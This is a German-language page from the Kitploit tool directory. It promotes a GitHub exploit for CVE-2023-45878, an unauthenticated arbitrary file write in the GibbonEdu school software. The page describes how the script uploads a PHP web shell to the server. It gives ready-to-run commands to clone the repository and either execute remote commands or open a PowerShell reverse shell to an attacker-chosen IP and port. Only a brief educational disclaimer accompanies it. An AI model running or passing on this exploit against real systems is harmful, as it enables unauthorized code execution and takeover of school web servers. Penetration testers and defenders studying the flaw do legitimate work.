Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-45878 — GibbonEdu Beliebiges Dateischreiben zur Remote-Codeausführung | Kitploit
Tools/GitHubGitHub/davidzzo23/cve-2023-45878
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubdavidzzo23/cve-2023-45878

CVE-2023-45878

GibbonEdu Beliebiges Dateischreiben zur Remote-Codeausführung

Repository anzeigen
32vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-45878

GibbonEdu – Beliebiger Datei-Schreibzugriff zur Web-Shell-Ausführung

Beschreibung

Dieses Repository enthält einen Exploit für CVE-2023-45878, eine Schwachstelle zum willkürlichen Schreiben von Dateien (Arbitrary File Write) in GibbonEdu. Die Schwachstelle betrifft den Endpunkt rubrics_visualise_saveAjax.php und ermöglicht es einem nicht authentifizierten Angreifer, beliebige Dateien auf den Webserver hochzuladen.

Dieses Skript nutzt die Schwachstelle aus, um eine PHP-Web-Shell hochzuladen und entweder:

  • einen bestimmten Systembefehl auszuführen;
  • eine base64-kodierte PowerShell-Reverse-Shell zu triggern, um Fernzugriff zu erhalten.

Verwendung

Das Skript unterstützt zwei Betriebsmodi:

  • --command (-c): Führt einen bestimmten Systembefehl remote aus.
  • --shell (-s): Triggert eine PowerShell-Reverse-Shell zum Listener des Angreifers.

So führen Sie den Exploit aus

1. Repository klonen

root@kitploit:~
git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878

2. Den Web-Shell-Exploit ausführen

  • Einen Remote-Befehl ausführen:
root@kitploit:~
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
  • Eine PowerShell-Reverse-Shell auslösen:
root@kitploit:~
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>

Haftungsausschluss

Dieses Skript ist ausschließlich für Bildungszwecke bestimmt. Die unbefugte Nutzung dieses Exploits auf Systemen ohne Erlaubnis ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diesen Exploit entstehen.

Tool herunterladen